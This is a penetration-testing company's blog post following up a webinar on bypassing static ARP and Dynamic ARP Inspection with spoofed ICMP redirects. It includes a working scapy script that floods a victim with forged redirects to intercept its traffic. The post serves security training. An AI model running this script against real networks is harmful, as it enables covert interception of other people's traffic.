Should I Stay or Should I Go
Hi everyone,
On October 20th, we at eLearnSecurity presented a webinar titled: Sneaky Man in the Middle Attack Exposed.
We had a lot of people attending with many enthusiastic comments and interesting questions. Thanks to everyone who made it!
In the webinar I demonstrated live how to circumvent common anti-man-in-the-middle techniques such as:
- Static ARP tables
- The Dynamic ARP Inspection feature of enterprise level switches
It is possbile to bypass these countermeasures by using a really neat networking feature: the ICMP redirect packets. This family of packets lets a router push to the clients different routes for a certain destination and are usually used to improve network efficiency.
Anyway, as some of you are probably thinking, this is not something completely new. Tools like Ettercap can use this technique to mount a half-duplex man-in-the-middle attack. As usual, we penetration tester never settle down, so we want more!
I then demonstrated how to use a very common networking technique to upgrade the attack to a full-duplex interception. It gets really fun when you use some everyday concepts in a new and interesting way. It surely has been for me and the people watching the live webinar.
You can access the full video and the rest of our technical webinars here – Sneaky Man in the Middle attack Exposed.
In the video you will see all the technical details about the attack and the whole approach used to create it.
But, what is a webinar without some free goodies for you guys!? Please find the scapy script used to mount the attack at the end of this blog post. Moreover we just released for free a very similar scenario for all our PTP students! If you are one of our students you will find a new lab scenario included in your Hera Lab subscription today.
As promised during the webinar, here is the scapy code:
# MitM against:
# - static ARP entries
# - Dynamic ARP inspection
# Prerequisites:
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE
# Creating and sending ICMP redirect packets between these entities:
originalRouterIP=''
attackerIP=''
victimIP=''
serverIP=''
# Here we create an ICMP Redirect packet
ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP
# The ICMP packet payload /should/ :) contain the original TCP SYN packet
# sent from the victimIP
redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP
fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555
# Release the Kraken!
while True:
send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
Questions? Ideas? Leave a comment!
Thanks for reading and happy hacking.